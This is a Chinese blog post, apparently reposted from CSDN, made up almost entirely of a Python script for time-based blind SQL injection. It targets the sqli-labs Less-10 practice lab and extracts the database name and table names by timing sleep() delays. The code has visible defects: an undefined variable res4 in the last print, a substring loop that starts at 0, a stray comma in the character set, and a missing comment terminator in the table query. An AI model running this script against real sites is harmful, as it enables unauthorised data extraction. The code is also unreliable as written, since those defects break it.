当前位置:网站首页>时间盲注脚本

时间盲注脚本

2022-08-03 05:22:00 wuqinghalasao 

import requests,time,string
# 假设页面无任何回显需要用到时间注入
url='http://192.168.28.133/sqli-labs-master/Less-10/?id=1" and '
a1=0
for a in range(10):
    start=time.time()
    res=requests.get(f"{url}if(length(database())={a},sleep(2),1)-- -")
    response = res.text
    end=time.time()
    if end-start>1:
        a1=a
        print(f'库名长度为{a1}')
        break
low = 'abcdefghijklmnopqrstuvw,xyz'
res1=''
for a2 in range(a1+1):
    for a3 in low:
        start = time.time()
        res3 = requests.get(f"{url}if(substr(database(),{a2},1)='{a3}',sleep(2),1)-- - ")
        response4=res3.text
        end = time.time()
        if end-start>1:
           res1+=a3
print(f'库名为{res1}')

# 查表数量,不需要判断表的数量,直接gruop_concat
res8=[]
# 取表名
res7 = ''
for a7 in range(1,60):
    for a8 in low:
        start = time.time()
        res6 = requests.get(f"{url}if(substr((SELECT group_concat(table_name) from information_schema.tables where table_schema='{res1}'),{a7},1)='{a8}',sleep(3),1) ")
        response6=res6.text
        end = time.time()
        if end - start > 2:
            res7+=a8
res8.append(res7)
print(res8)

print(f'数据库{res4}有{res8}表')
原网站

版权声明
本文为[wuqinghalasao]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_55347427/article/details/126116655

边栏推荐

猜你喜欢

随机推荐